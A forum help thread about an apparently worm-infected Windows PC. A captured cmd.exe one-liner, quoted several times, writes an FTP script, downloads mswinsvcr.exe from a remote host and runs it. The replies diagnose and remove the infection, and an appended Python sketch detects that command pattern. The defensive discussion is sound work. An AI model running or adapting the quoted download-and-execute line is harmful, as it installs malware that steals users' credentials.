PC typed by itself "%systemroot%\system32\cmd.exe del eq&echo open

Guest

Hi, please help me. I work from home and for a while now I'm getting this
message anywhere the cursor is, so I opened Notepad and was able to catch it
entirely, as follows:

%systemroot%\system32\cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq

The main message is always the same except for the numbers after the
"eq&echo user"

Thank you in advance,
 
John John

I think that you may have a backdoor worm or someone is trying to hack
your box. By searching on "mswinsvcr.exe" I came up with these
possibilities:

WORM/IrcBot.uxm
WORM/Rbot.Gen

These things will monitor your activity, and if you go to places like
PayPal they will capture your account and password information; then the
thieves may be able to use the information to commit fraud.

John
 
Malke

Isabella said:
Hi, please help me. I work from home and for a while now I'm getting this
message anywhere the cursor is, so I opened Notepad and was able to catch it
entirely, as follows:

%systemroot%\system32\cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq

The main message is always the same except for the numbers after the
"eq&echo user"

Thank you in advance,

Your machine is infected. Take it off any networks and clean it up.

http://www.google.com/search?hl=en&q=mswinsvcr.exe&btnG=Google+Search

Go through these general malware removal steps systematically -
http://www.elephantboycomputers.com/page2.html#Removing_Malware

Include scanning with David Lipman's Multi_AV and follow instructions to
do all scans in Safe Mode. After you've done the scanning with David's
utility, if you don't have a current version antivirus (not earlier than
2006) get one such as Avast and install it, update its definitions, and
do a thorough scan with it in Safe Mode.

http://www.elephantboycomputers.com/page2.html#Multi-AV - instructions
http://www.pctipp.ch/downloads/sicherheit/35905/multi_av_scanning_tool.html
- download site

The site is in German but David's tool is in English so don't let that
worry you. Scroll all the way down to almost the bottom of the page and
you'll see a box titled "Infos Zum Download - Multi-AV Scanning Tool".
You'll see "Download von www pctipp.ch" and the live link to download
Multi_AV.

When all else fails, run HijackThis and post your log in one of the
specialty forums listed at the first link above (not here, please).

Standard caveat: If the procedures look too complex - and there is no
shame in admitting this isn't your cup of tea - take the machine to a
professional computer repair shop (not your local version of
BigComputerStore/GeekSquad). Please be aware that not all local shops
are skilled at removing malware and even if they are, your computer may
be so infested that Windows will need to be clean-installed. Have all
your data backed up before you take the machine into a shop.



Malke
 
Guest

Hi Malke:

Wow, very detailed and useful information there. I will try it.
I'm not an expert but I built my pc and I think I can follow the steps.

But the big question is: I do have antispyware, firewall and antivirus from
McAfee with the 24/7 auto online updates and my scans twice a week are clean,
not even a cookie there since I clean it and delete it manually, from IE and
the Java folders at the end of every single day. How?

And the sad part is that my client technical support told me McAfee doesn't
have a cure!!!

So I guess I'm on my own.
I will check all that you suggested and if I can't clean it I will go with a
fresh reformat and an XP install.

Thank you,
-
Isabella
 
Jim

Isabella said:
Hi Malke:

Wow, very detailed and useful information there. I will try it.
I'm not an expert but I built my pc and I think I can follow the steps.

But the big question is: I do have antispyware, firewall and antivirus from
McAfee with the 24/7 auto online updates and my scans twice a week are clean,
not even a cookie there since I clean it and delete it manually, from IE and
the Java folders at the end of every single day. How?

And the sad part is that my client technical support told me McAfee doesn't
have a cure!!!

So I guess I'm on my own.
I will check all that you suggested and if I can't clean it I will go with a
fresh reformat and an XP install.

Thank you,
-
Isabella

Now you know why a lot of people don't care for McAfee....
I would get David Lipman's Multi-AV package, but I don't have a good address
for it at hand.
Jim
 
Ace

In all honesty, in view of some of the replies you have already
received.. I would not bother with cleaning.
The longer you work on your machine, the more time you give whoever has
control of your machine to steal more of your personal data.
Unplug from the 'net, back up your documents, reformat, reinstall.
Scan the backup with a good updated virus scanner before you use it.
 
ZachIRC

Hi, please help me. I work from home and for a while now I'm getting this
message anywhere the cursor is, so I opened Notepad and was able to catch it
entirely, as follows:

%systemroot%\system32\cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq

The main message is always the same except for the numbers after the
"eq&echo user"

Thank you in advance,

Do you have VNC? If so, get the latest version or remove it. There is a
vuln in it that lets bots connect. [The typing you see]
 
lcscury

this is for sure VNC

Hi, please help me. I work from home and for a while now I'm getting this
message anywhere the cursor is, so I opened Notepad and was able to catch it
entirely, as follows:

%systemroot%\system32\cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq

The main message is always the same except for the numbers after the
"eq&echo user"

Thank you in advance,

Do you have VNC? If so, get the latest version or remove it. There is a
vuln in it that lets bots connect. [The typing you see]
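
Added example (not part of any post in this thread): a Python sketch that splits the captured one-liner on `&` and reconstructs what it does, which is the pattern worth alerting on in process command-line logs: an FTP script written with `echo`, run with `ftp -n -s:`, the fetched file executed, and the script deleted. The function name `analyze` and the benign contrast line are constructed for illustration.

```python
import re

# Command exactly as captured in the original post, joined onto one line.
CAPTURED = ("del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq "
            "&echo get mswinsvcr.exe >> eq &echo quit >> eq "
            "&ftp -n -s:eq &mswinsvcr.exe &del eq")
# Constructed benign line for contrast.
BENIGN = "echo build started >> build.log & dir"

ECHO_TO_FILE = re.compile(r"^echo\s+(.*?)\s*>>?\s*(\S+)$", re.I)
FTP_SCRIPT = re.compile(r"^ftp\b.*?\s-s:(\S+)", re.I)


def analyze(cmdline):
    """Split a cmd.exe one-liner on '&' and reconstruct what it does."""
    steps = [s.strip() for s in cmdline.split("&") if s.strip()]
    scripts = {}  # file name -> lines echoed into it
    result = {"ftp_script": None, "server": None, "fetched": [],
              "executed": [], "cleanup": False, "suspicious": False}
    for step in steps:
        m = ECHO_TO_FILE.match(step)
        if m:
            scripts.setdefault(m.group(2).lower(), []).append(m.group(1))
            continue
        m = FTP_SCRIPT.match(step)
        if m and m.group(1).lower() in scripts:
            # ftp is driven by a script that this same line just wrote
            result["ftp_script"] = m.group(1).lower()
            for line in scripts[result["ftp_script"]]:
                words = line.split()
                if not words:
                    continue
                if words[0].lower() == "open":
                    result["server"] = " ".join(words[1:])
                elif words[0].lower() == "get" and len(words) > 1:
                    result["fetched"].append(words[1].lower())
            continue
        parts = step.lower().split()
        if parts[0] in result["fetched"]:
            result["executed"].append(parts[0])  # downloaded file is run
        elif parts[0] == "del" and result["ftp_script"] in parts[1:]:
            result["cleanup"] = True  # script removed afterwards
    # Flag only the full chain: self-written ftp script plus run of its download
    result["suspicious"] = bool(result["ftp_script"] and result["executed"])
    return result
```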
 
